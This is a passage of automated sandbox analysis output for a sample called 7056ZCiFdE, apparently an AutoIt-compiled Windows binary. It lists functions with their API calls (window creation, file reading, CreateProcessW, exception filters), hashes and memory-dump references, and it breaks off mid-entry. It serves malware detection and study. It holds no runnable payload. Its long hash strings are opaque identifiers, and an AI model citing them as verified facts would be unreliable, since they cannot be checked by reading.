                                    • Instruction ID: 5d24131771877721f1f99df45e9c99aaab165559e3e4a7ba93d32db8b102197b
                                    • Opcode Fuzzy Hash: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                                    • Instruction Fuzzy Hash: 70D05E3226450EAFEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D935AB60
                                    Function 0090C909 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,008BB9BC,?,?,?,?,?,?), ref: 0090C934
                                      • Part of subcall function 0090B635: _memset.LIBCMT ref: 0090B644
                                      • Part of subcall function 0090B635: _memset.LIBCMT ref: 0090B653
                                      • Part of subcall function 0090B635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00946F20,00946F64), ref: 0090B682
                                      • Part of subcall function 0090B635: CloseHandle.KERNEL32 ref: 0090B694
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                    • String ID:
                                    • API String ID: 2364484715-0
                                    • Opcode ID: 85f01fccf9e95a69b97cc8cfbdacc25acbec1bbab7d7fc70021d52d0077fe919
                                    • Instruction ID: 097a9497a812de97fd055551cd9f2c911ca5c070ce6f98c5ca3fcb1179ed2fd4
                                    • Opcode Fuzzy Hash: 85f01fccf9e95a69b97cc8cfbdacc25acbec1bbab7d7fc70021d52d0077fe919
                                    • Instruction Fuzzy Hash: 0FE01276110208EFCB01AF44DC10E9537A5FB18310F018010FA16572B2CB31A920EF50
                                    Function 0088167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00881AEE,?,?,?), ref: 008816AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 21ccd5151ee8959999f3a97ec74b7e0ba5697942027249d179babf3b4df99139
                                    • Instruction ID: cc2f113b08c1db009107d60fba5f5510b02403973ed65f3c1db082317a80ab5b
                                    • Opcode Fuzzy Hash: 21ccd5151ee8959999f3a97ec74b7e0ba5697942027249d179babf3b4df99139
                                    • Instruction Fuzzy Hash: 02E0EC35104208FBCF15EF94DC21E643B26FB59314F508428FA459A2A2CA32A522EB51
                                    Function 0090C88F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 0090C8B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 2ec0c47902d08f768d988245e64da702522bb33bfe6861917f9d17a12f045ec8
                                    • Instruction ID: 073ec9b5fa9254fc339bc1a93299d432739339a99a69123c80854dea30c04c5e
                                    • Opcode Fuzzy Hash: 2ec0c47902d08f768d988245e64da702522bb33bfe6861917f9d17a12f045ec8
                                    • Instruction Fuzzy Hash: A9E0E239214209EFCB01DF88D844D963BA5AB1D300F014054FA0547362CB71A820EBA1
                                    Function 0090C860 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 0090C885
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 54ffeb8a79fc7cc273867c703cd287372976f7c0a41d8dc161fe6722e933a59e
                                    • Instruction ID: 043eb77161a32faf8212d4ad9bfd447fda73d71f8c767bf55497ff925e835308
                                    • Opcode Fuzzy Hash: 54ffeb8a79fc7cc273867c703cd287372976f7c0a41d8dc161fe6722e933a59e
                                    • Instruction Fuzzy Hash: E2E04279254249EFDB01DF88DC95E963BA5AB1D700F014054FA1557362CB71A920EB61
                                    Function 008816B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                      • Part of subcall function 0088201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008820D3
                                      • Part of subcall function 0088201B: KillTimer.USER32(-00000001,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 0088216E
                                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00881AE2,?,?), ref: 008816D4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                    • String ID:
                                    • API String ID: 2797419724-0
                                    • Opcode ID: a72f8ca5ac72fb0fc1b29b8f86e4998f01ea8547eab37bb3bb12554576d5d0a4
                                    • Instruction ID: 30d069f29bc3aeeb6c5bb1f4e4081f8abfb2e0cb0b41267d8d23b910038e87cb
                                    • Opcode Fuzzy Hash: a72f8ca5ac72fb0fc1b29b8f86e4998f01ea8547eab37bb3bb12554576d5d0a4
                                    • Instruction Fuzzy Hash: 9AD01271140308BBDA20BB94DC17F593A1DEB14750F408021BA04E91D3DA716910A659
                                    Function 008AA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008AA12A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                                    • Instruction ID: 3839de2d887679ae65c6d4375d6ab527ffb68ddb97dc360c686ca4555ebd2467
                                    • Opcode Fuzzy Hash: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                                    • Instruction Fuzzy Hash: 09A0123001810CABCA001B41EC044447F9CD6002E07004020F40C40421873255105580
                                    Function 00898808 Relevance: .6, Instructions: 590COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 909bff7c8dc5e2fa141612666afc866cdc3b5c5f60cfc940238df10d34a7295d
                                    • Instruction ID: a3108b1c07577f671b4745d628c2dad9c24caf0d98b47701bcbf35d78c5adf65
                                    • Opcode Fuzzy Hash: 909bff7c8dc5e2fa141612666afc866cdc3b5c5f60cfc940238df10d34a7295d
                                    • Instruction Fuzzy Hash: 2722143060451BCBDF28AA24C49477CBBE1FB46358F3C826BD956CB692DB70DD91CA42
                                    Function 008A21C5 Relevance: .3, Instructions: 345COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction ID: c041df5a4fb47c91b9d4f1417c5d54559afcb85ef7ee097883059321a8bae461
                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction Fuzzy Hash: 26C182322050A30AEF6D463D843413EFAA1BFA37B171A075DD8B2DB9D4EE24C965D720
                                    Function 008A25FA Relevance: .3, Instructions: 341COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction ID: ab019f320124dfb35ac268a07ae69c3c1733e274f4e1c60809b3109414c310a1
                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction Fuzzy Hash: E6C173322051A30AEF3D463E843453EBAA1BFA37B171A076DD4B2DB9D4EE14C925D720
                                    Function 008A1978 Relevance: .3, Instructions: 323COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: db5ccb8c4af99a4d9752350da73db13cead079a295a5b9b74fc989aa20c866a3
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: 7CC170322051A309EF6D4639847813EBAA1EFA37B171A176DD4B2DB9C4EE20D925D720
                                    Function 015FBF30 Relevance: .1, Instructions: 92COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction ID: e9ae8ca92932e80a157f1ac6f0dc5b7449f83dbb25f5cde1adf86a696c26c6d5
                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                    • Instruction Fuzzy Hash: C841C2B1D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                    Function 015FBDC0 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction ID: c5f8c2ba70d5d93516fa70f3652afc6414421d8cd906455ca6e9a796a92ec12b
                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                    • Instruction Fuzzy Hash: 3D01A478A00109EFCB48DF98C5909AEF7F5FF48310F208599DA09AB341D730AE41DB80
                                    Function 015FBE20 Relevance: .0, Instructions: 35COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction ID: 2bae1186ad3a20cfa3aa806440486723b1cfd87d35e429e98b5b3f4ba9dab905
                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                    • Instruction Fuzzy Hash: B6019278A10109EFCB44DF98C5909AEF7F5FB48310F208599DA19AB301D730AE41DB80
                                    Function 015FA75E Relevance: .0, Instructions: 17COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 39883051ad0acd5fc3a9b65a285c220fc8651299cfdca9718842298b505bee9e
                                    • Instruction ID: 12cbbee2ad97ca28ebd479973cedbf0f86dc4bb29c9604106d163cb5d8cfbbc3
                                    • Opcode Fuzzy Hash: 39883051ad0acd5fc3a9b65a285c220fc8651299cfdca9718842298b505bee9e
                                    • Instruction Fuzzy Hash: F6C08C300453C89ADB028759E08C7407BEDAB0AA18F1400E4D8080BA02C3A96A048A45
                                    Function 015FA770 Relevance: .0, Instructions: 6COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                    Function 008F7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 008F785B
                                    • DeleteObject.GDI32(00000000), ref: 008F786D
                                    • DestroyWindow.USER32 ref: 008F787B
                                    • GetDesktopWindow.USER32 ref: 008F7895
                                    • GetWindowRect.USER32(00000000), ref: 008F789C
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008F79DD
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008F79ED
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7A35
                                    • GetClientRect.USER32(00000000,?), ref: 008F7A41
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008F7A7B
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7A9D
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7AB0
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7ABB
                                    • GlobalLock.KERNEL32(00000000), ref: 008F7AC4
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7AD3
                                    • GlobalUnlock.KERNEL32(00000000), ref: 008F7ADC
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7AE3
                                    • GlobalFree.KERNEL32(00000000), ref: 008F7AEE
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 008F7B00
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00912CAC,00000000), ref: 008F7B16
                                    • GlobalFree.KERNEL32(00000000), ref: 008F7B26
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 008F7B4C
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 008F7B6B
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7B8D
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7D7A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: 0867d95d4cfcec0a5f2f4a7c686cfe1f2f215aa699649b05ecdc0f9a37167a34
                                    • Instruction ID: 4a3d3f5545318d6784f68864aa0cc5eb0a735a633c32fa5047d05664fe4fd8dc
                                    • Opcode Fuzzy Hash: 0867d95d4cfcec0a5f2f4a7c686cfe1f2f215aa699649b05ecdc0f9a37167a34
                                    • Instruction Fuzzy Hash: 3F028B71A14119EFEB14DFA8CC99EAE7BB9FB48310F148168F915EB2A1C7709D01DB60
                                    Function 0090356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,0090F910), ref: 00903627
                                    • IsWindowVisible.USER32(?), ref: 0090364B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BuffCharUpperVisibleWindow
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 4105515805-45149045
                                    • Opcode ID: 0065f633b84378dd0871d770a71a92396cae57e3d61dc8a1cc35340b2d00438a
                                    • Instruction ID: e0cc7fe3bb9580859ee742f3d5c487ef60b50de9f959b69a7afd1e09ae5f0472
